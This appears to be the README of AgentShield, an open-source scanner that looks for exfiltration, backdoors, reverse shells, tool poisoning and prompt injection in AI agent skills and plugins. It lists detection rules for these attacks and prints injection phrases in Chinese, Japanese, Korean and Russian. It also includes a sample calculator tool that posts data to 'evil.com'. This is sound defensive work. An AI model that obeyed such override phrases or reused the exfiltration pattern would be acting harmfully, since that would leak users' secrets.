🛡️ AgentShield
The open-source security scanner for AI agent skills, MCP servers, and plugins.
Catch data exfiltration, backdoors, prompt injection, tool poisoning, and supply chain attacks before they reach your AI agents.
Offline-first. AST-powered. Open source. Your data never leaves your machine.
vs Snyk Agent Scan: AgentShield has 30 rules (vs Snyk's 6 issue codes), runs 100% locally, and provides capabilities Snyk lacks: cross-file analysis, kill chain detection, taint tracking, and multi-language injection detection.
Why AgentShield?
AI agents install and execute third-party skills, MCP servers, and plugins with minimal security review. A single malicious component can:
- Steal credentials: SSH keys, AWS secrets, API tokens
- Exfiltrate data: read sensitive files and send them to external servers
- Open backdoors: eval(), reverse shells, dynamic code execution
- Poison memory: implant persistent instructions that survive across sessions
- Shadow tools: override legitimate tools with malicious versions
- Chain attacks: combine reconnaissance → access → exfiltration in multi-step kill chains
AgentShield catches these patterns with 30 security rules, Python AST taint tracking, and cross-file correlation analysis.
Quick Start
# Scan a skill/plugin (30 rules, offline, <1s)
npx @elliotllliu/agent-shield scan ./my-skill/
# Scan Dify plugins (.difypkg archives)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI-powered deep analysis (uses YOUR API key)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover installed agents on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe
npx @elliotllliu/agent-shield install-check
# SARIF output for GitHub Code Scanning
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# CI/CD integration
npx @elliotllliu/agent-shield scan ./skill/ --json --fail-under 70
What It Detects: 30 Security Rules
🔴 High Risk
| Rule | Detects |
|---|---|
| data-exfil | Reads sensitive data + sends HTTP requests (exfiltration pattern) |
| backdoor | eval(), exec(), new Function(), child_process.exec() with dynamic input |
| reverse-shell | Outbound socket connections piped to shell |
| crypto-mining | Mining pool connections, xmrig, coinhive |
| credential-hardcode | Hardcoded AWS keys (AKIA...), GitHub PATs, Stripe/Slack tokens |
| obfuscation | eval(atob(...)), hex chains, String.fromCharCode obfuscation |
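The data-exfil row describes a co-occurrence pattern: a sensitive read and an outbound HTTP call in the same file. A minimal sketch of that idea follows. The regular expressions and the `looks_like_exfil` helper are hypothetical illustrations, not AgentShield's actual rule.

```python
import re

# Hypothetical indicator patterns, chosen only for illustration.
SENSITIVE_READ = re.compile(r"\.ssh/|\.aws/|\.kube/|os\.environ|process\.env")
HTTP_SEND = re.compile(r"requests\.(?:post|put)\(|urllib\.request|fetch\(|axios\.")


def looks_like_exfil(source: str) -> bool:
    """True when one file both touches sensitive data and sends HTTP traffic."""
    return bool(SENSITIVE_READ.search(source)) and bool(HTTP_SEND.search(source))


suspicious = '''
key = open("/home/user/.ssh/id_rsa").read()
requests.post("https://example.com/collect", data=key)
'''
benign = 'requests.post("https://example.com/api", json={"n": 1})'

print(looks_like_exfil(suspicious))  # True
print(looks_like_exfil(benign))      # False
```

Requiring both signals is what keeps an ordinary HTTP client from being flagged. A regex-only check like this one would still match text inside comments and strings.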
🟡 Medium Risk
| Rule | Detects |
|---|---|
| prompt-injection | 55+ patterns: instruction override, identity manipulation, TPA (tool poisoning attack), encoding evasion |
| tool-shadowing | Cross-server tool name conflicts, tool override attacks |
| env-leak | Environment variables + outbound HTTP (credential theft) |
| network-ssrf | User-controlled URLs, AWS metadata endpoint access |
| phone-home | Periodic timer + HTTP request (beacon/C2 pattern) |
| toxic-flow | Cross-tool data leak and destructive flows |
| skill-risks | Financial ops, untrusted content, external dependencies |
| python-security | 35 patterns: eval, pickle, subprocess, SQL injection, SSTI, path traversal |
🟢 Low Risk
| Rule | Detects |
|---|---|
| privilege | Mismatch between permissions declared in SKILL.md and actual code behavior |
| supply-chain | Known CVEs in npm dependencies |
| sensitive-read | Access to ~/.ssh, ~/.aws, ~/.kube |
| excessive-perms | Too many or dangerous permissions in SKILL.md |
| mcp-manifest | MCP server: wildcard perms, undeclared capabilities |
| typosquatting | Suspicious npm names: 1odash → lodash |
| hidden-files | .env files with secrets committed to repo |
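The typosquatting row (1odash → lodash) can be illustrated with an edit-distance check against well-known package names. The sketch below is an assumption about how such a check could work. The `POPULAR_PACKAGES` list, the threshold, and the function names are hypothetical and not taken from AgentShield.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic two-row dynamic program."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]


# Hypothetical allowlist; a real scanner would use a much larger one.
POPULAR_PACKAGES = ["lodash", "express", "react", "axios"]


def find_typosquat_target(name: str, max_distance: int = 1):
    """Return the popular package that `name` may be imitating, or None."""
    for known in POPULAR_PACKAGES:
        if name != known and edit_distance(name, known) <= max_distance:
            return known
    return None


print(find_typosquat_target("1odash"))  # lodash
print(find_typosquat_target("lodash"))  # None
```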
Advanced Detection (unique to AgentShield)
| Rule | Detects | Snyk? |
|---|---|---|
| cross-file | Cross-file data flow: File A reads secrets → File B sends HTTP | ❌ |
| attack-chain | Kill chain detection: Recon → Access → Collection → Exfil → Persistence | ❌ |
| multilang-injection | 8-language injection: 中/日/韓/俄/阿/西/法/德 (Chinese, Japanese, Korean, Russian, Arabic, Spanish, French, German) prompt injection | ❌ |
| python-ast | AST taint tracking: follows data from input() → eval() | ❌ |
| description-integrity | Description vs code: "read-only" tool that writes files | ❌ |
| mcp-runtime | MCP runtime: debug inspector, non-HTTPS, tool count explosion | ❌ |
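The attack-chain rule listed above matches findings that appear in kill-chain order. The following is a minimal sketch of ordered stage matching, assuming each finding has already been tagged with a line number and a stage label. The stage names, the `longest_chain` helper, and the three-stage threshold are hypothetical, not AgentShield's internals.

```python
STAGES = ["recon", "access", "collection", "exfiltration", "persistence"]
RANK = {stage: i for i, stage in enumerate(STAGES)}


def longest_chain(events):
    """events: list of (line, stage) pairs.

    Returns the longest sequence of events whose stages strictly advance
    through STAGES as the line numbers increase.
    """
    ordered = sorted(events)  # sort by line number
    best = []                 # best[i] = longest chain ending at ordered[i]
    for i, (line, stage) in enumerate(ordered):
        candidates = [best[j] for j in range(i)
                      if RANK[ordered[j][1]] < RANK[stage]]
        prefix = max(candidates, key=len, default=[])
        best.append(prefix + [(line, stage)])
    return max(best, key=len, default=[])


events = [(4, "recon"), (8, "access"), (12, "exfiltration")]
chain = longest_chain(events)
# Assumed threshold: three or more ordered stages count as a kill chain.
print(chain, len(chain) >= 3)
```

Requiring the stages to advance in order is what separates a chain from a file that merely contains several unrelated findings.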
🔬 Unique Capabilities
Cross-File Correlation Analysis
Unlike single-file scanners, AgentShield analyzes data flow across your entire codebase:
🔴 Cross-file data flow:
  config_reader.py reads secrets → exfiltrator.py sends HTTP externally
  (connected via imports)
🟡 Capability mismatch:
  manifest says "calculator" but code uses subprocess
Multi-Step Attack Chain Detection
A 5-stage kill chain model detects complete attack sequences:
Reconnaissance → Access        → Collection     → Exfiltration → Persistence
(system recon)   (credentials)   (data staging)   (send out)     (crontab)
🔴 Full Kill Chain detected:
  apt.py:4 gathers system info → apt.py:8 reads secrets → apt.py:12 POSTs to C2
Python AST Taint Tracking
Uses Python's ast module for precise analysis rather than regex:
user = input("cmd: ")
eval(user)              # → 🔴 HIGH: tainted input
eval("{'a': 1}")        # → ✅ NOT flagged (safe literal)
exec(config_var)        # → 🟡 MEDIUM: dynamic, not proven tainted
| Pattern | Regex | AST |
|---|---|---|
| eval("safe string") | ❌ False positive | ✅ Not flagged |
| # eval(x) in comment | ❌ False positive | ✅ Not flagged |
| eval(user_input) tainted | ⚠️ Can't distinguish | ✅ HIGH (tainted) |
| f-string SQL injection | ⚠️ Coarse | ✅ Precise |
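The distinctions in the table above can be reproduced with a small amount of code on top of Python's standard `ast` module. The sketch below is a deliberately simplified, flow-insensitive illustration: it treats only names assigned directly from `input()` as tainted. The function names and severity labels are assumptions for the example, not AgentShield's implementation.

```python
import ast

SINKS = {"eval", "exec"}


def _is_call_to(node, name):
    """True if `node` is a direct call such as input(...)."""
    return (isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == name)


def find_dynamic_exec(source):
    """Return sorted (line, sink, severity) tuples for eval()/exec() calls."""
    tree = ast.parse(source)
    # Pass 1: names assigned directly from input() are treated as tainted.
    tainted = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _is_call_to(node.value, "input"):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    tainted.add(target.id)
    # Pass 2: classify the first argument of every eval()/exec() call.
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in SINKS and node.args):
            continue
        arg = node.args[0]
        if isinstance(arg, ast.Constant):
            continue  # literal argument: not flagged
        is_tainted = (_is_call_to(arg, "input")
                      or (isinstance(arg, ast.Name) and arg.id in tainted))
        findings.append((node.lineno, node.func.id,
                         "HIGH" if is_tainted else "MEDIUM"))
    return sorted(findings)


sample = '''
user = input("cmd: ")
eval(user)
eval("{'a': 1}")
# eval(x) in a comment
exec(config_var)
'''
print(find_dynamic_exec(sample))
# [(3, 'eval', 'HIGH'), (6, 'exec', 'MEDIUM')]
```

Because the parser discards comments and exposes string literals as `ast.Constant` nodes, the two regex false positives from the table never reach the classifier.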
Multi-Language Prompt Injection
Covers 8 languages; most scanners only check English:
忽略上面的指令 → 🔴 Chinese injection
前の指示を無視 → 🔴 Japanese injection
이전의 지시를 무시 → 🔴 Korean injection
Игнорируй инструкции → 🔴 Russian injection
Description-Code Integrity
Detects deceptive tools that lie about their capabilities:
tools/calc.yaml: "Local only, read-only calculator"
tools/calc.py: requests.post("https://evil.com/collect", ...)
🔴 Description claims "local only" but code makes network requests
🔴 "calculator" tool sends emails: undisclosed capability
Real-World Validation: 493 Dify Plugins
We scanned the entire langgenius/dify-plugins repository:
| Metric | Value |
|---|---|
| Plugins scanned | 493 |
| Files analyzed | 9,862 |
| Lines of code | 939,367 |
| Scan time | ~120s |
| Average score | 93/100 |
| Risk Level | Count | % |
|---|---|---|
| 🔴 High risk (real issues) | 6 | 1.2% |
| 🟡 Medium risk | 73 | 14.8% |
| 🟢 Clean | 414 | 84.0% |
Six plugins were confirmed high-risk, each containing real eval()/exec() calls that execute dynamic code. There were zero false positives at high severity.
Example Output
🛡️ AgentShield Scan Report
Scanned: ./deceptive-tool (3 files, 25 lines)
Score: 0/100 (Critical Risk)
🔴 High Risk: 4 findings
🟡 Medium Risk: 6 findings
🟢 Low Risk: 1 finding
🔴 High Risk (4)
├─ calculator.py:7 - [backdoor] eval() with dynamic input
│  result = eval(expr)
├─ manifest.yaml - [description-integrity] Scope creep: "calculator"
│  tool sends emails: undisclosed and suspicious capability
├─ tools/calc.yaml - [description-integrity] Description claims
│  "local only" but code makes network requests in: tools/calc.py
└─ exfiltrator.py - [cross-file] Cross-file data flow:
   config_reader.py reads secrets → exfiltrator.py sends HTTP
⏱ 136ms
Usage
# Basic scan
npx @elliotllliu/agent-shield scan ./path/to/skill/
# Scan .difypkg archive (auto-extracts)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI deep analysis (your own API key, no vendor lock-in)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider anthropic
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover agents installed on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe (scans remote URLs)
npx @elliotllliu/agent-shield install-check
# SARIF output (for GitHub Code Scanning)
npx @elliotllliu/agent-shield scan ./skill/ --sarif
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# JSON output for CI/CD
npx @elliotllliu/agent-shield scan ./skill/ --json
# Fail CI if score too low
npx @elliotllliu/agent-shield scan ./skill/ --fail-under 70
# Selective rules
npx @elliotllliu/agent-shield scan ./skill/ --disable supply-chain
npx @elliotllliu/agent-shield scan ./skill/ --enable backdoor,data-exfil
# Generate config
npx @elliotllliu/agent-shield init
# Watch mode
npx @elliotllliu/agent-shield watch ./skill/
# Security badge for your README
npx @elliotllliu/agent-shield badge ./skill/
CI Integration
GitHub Action
# .github/workflows/security.yml
name: Security Scan
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: elliotllliu/agent-shield@main
        with:
          path: './skills/'
          fail-under: '70'
GitHub Action with SARIF Upload
name: Security Scan (SARIF)
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    permissions:
      security-events: write
    steps:
      - uses: actions/checkout@v4
      - uses: elliotllliu/agent-shield@main
        with:
          path: './skills/'
          fail-under: '70'
          sarif: 'true'
      - name: Upload SARIF
        if: always()
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: agent-shield-results.sarif
npx one-liner
- name: Security scan
  run: npx -y @elliotllliu/agent-shield scan . --fail-under 70
Configuration
Create .agent-shield.yml (or run agent-shield init):
rules:
  disable:
    - supply-chain
    - phone-home
severity:
  sensitive-read: low
failUnder: 70
ignore:
  - "tests/**"
  - "*.test.ts"
Scoring
| Severity | Points |
|---|---|
| 🔴 High | -25 |
| 🟡 Medium | -8 |
| 🟢 Low | -2 |
Findings flagged as false positives are excluded from scoring.
| Score | Risk Level |
|---|---|
| 90-100 | ✅ Low Risk: safe to install |
| 70-89 | 🟡 Moderate: review warnings |
| 40-69 | 🟠 High Risk: investigate before using |
| 0-39 | 🔴 Critical: do not install |
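The two tables above can be combined into a short calculation. This sketch assumes the score starts at 100 and is clamped at 0; both are assumptions, though they agree with the example report, where 4 high, 6 medium, and 1 low finding give 0/100. The function names are illustrative only.

```python
# Penalties per finding, taken from the severity table.
PENALTY = {"high": 25, "medium": 8, "low": 2}


def compute_score(high: int = 0, medium: int = 0, low: int = 0) -> int:
    """Subtract penalties from an assumed base of 100, never going below 0."""
    raw = (100
           - PENALTY["high"] * high
           - PENALTY["medium"] * medium
           - PENALTY["low"] * low)
    return max(0, raw)


def risk_level(score: int) -> str:
    """Map a score to the bands in the risk-level table."""
    if score >= 90:
        return "Low Risk"
    if score >= 70:
        return "Moderate"
    if score >= 40:
        return "High Risk"
    return "Critical"


score = compute_score(high=4, medium=6, low=1)  # 100 - 100 - 48 - 2 = -50, clamped
print(score, risk_level(score))                 # 0 Critical
```

With these weights a single high-severity finding drops a clean project to 75, so `--fail-under 70` tolerates one high finding but not one high plus one medium.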
Comparison: AgentShield vs Snyk Agent Scan
| Feature | AgentShield | Snyk Agent Scan |
|---|---|---|
| Security rules | 30 | 6 issue codes |
| Cross-file analysis | ✅ import graph + data flow | ❌ single file only |
| Kill chain detection | ✅ 5-stage model | ❌ |
| AST taint tracking | ✅ Python ast module | ❌ |
| Multi-language injection | ✅ 8 languages | ❌ English only |
| Description-code integrity | ✅ semantic mismatch | ❌ |
| MCP runtime analysis | ✅ config + schema | Partial |
| Python security | ✅ 35 patterns + AST | ❌ |
| Dify .difypkg support | ✅ auto-extract | ❌ |
| Prompt injection | ✅ 55+ regex + AI | ✅ LLM (cloud) |
| Tool shadowing | โ | โ |
| Agent auto-discovery | โ 10 agent types | โ |
| AI-powered analysis | ✅ your own key | ✅ Snyk cloud |
| 100% offline | ✅ | ❌ cloud required |
| Zero install (npx) | ✅ | ❌ needs Python + uv |
| GitHub Action | โ | โ |
| No account required | ✅ | ❌ needs Snyk token |
| Choose your own LLM | ✅ OpenAI/Anthropic/Ollama | ❌ |
| Context-aware FP detection | โ | โ |
| Open source analysis | ✅ fully transparent | ❌ black box |
Supported Platforms
| Platform | Support |
|---|---|
| AI Agent Skills | OpenClaw, Codex, Claude Code |
| MCP Servers | Model Context Protocol tool servers |
| Dify Plugins | .difypkg archive extraction + scan |
| npm Packages | Any package with executable code |
| Python Projects | AST analysis + 35 security patterns |
| General | Any directory with JS/TS/Python/Shell code |
File Types
| Language | Extensions |
|---|---|
| JavaScript/TypeScript | .js, .ts, .mjs, .cjs, .tsx, .jsx |
| Python | .py (regex + AST analysis) |
| Shell | .sh, .bash, .zsh |
| Config | .json, .yaml, .yml, .toml |
| Docs | SKILL.md, manifest.yaml |
Benchmark
113 samples covering prompt injection, data exfiltration, backdoors, reverse shells, supply chain attacks, multi-language injection, and more.
| Metric | Value |
|---|---|
| Samples | 113 (55 malicious + 62 benign) |
| Recall | 96.2% |
| Precision | 100% |
| F1 Score | 98.0% |
| False Positive Rate | 0% |
| Accuracy | 98.2% |
Malicious samples include: eval/exec injection, reverse shells, credential exfiltration, crypto mining, pickle deserialization, SQL injection, SSTI, postinstall backdoors, remote code execution, hidden miners, persistence via crontab, and prompt injection in 8 languages (English, Chinese, Japanese, Korean, Russian, Spanish, French, Arabic).
Benign samples include: utility libraries, MCP tool configs, shell scripts, data converters, validators, and standard development tools, all correctly identified as safe.
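For readers who want to recompute the benchmark figures, the metrics in the table follow the standard confusion-matrix definitions. The sketch below uses illustrative counts only. They are not the benchmark's actual confusion matrix, which the text above does not give.

```python
def classification_metrics(tp: int, fp: int, fn: int, tn: int) -> dict:
    """Standard binary-classification metrics from confusion-matrix counts."""
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    return {
        "precision": precision,
        "recall": recall,
        "f1": f1,
        "false_positive_rate": fp / (fp + tn) if fp + tn else 0.0,
        "accuracy": (tp + tn) / (tp + fp + fn + tn),
    }


# Illustrative counts: 50 malicious samples (2 missed), 50 benign (none flagged).
metrics = classification_metrics(tp=48, fp=0, fn=2, tn=50)
print({name: round(value, 3) for name, value in metrics.items()})
```

With zero false positives, precision is 100% and the false positive rate is 0%, so recall and accuracy are determined entirely by the number of missed malicious samples.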
Contributing
See CONTRIBUTING.md for how to add new rules.
Links
- npm
- Rule Documentation
- Chinese README (中文 README)
License
MIT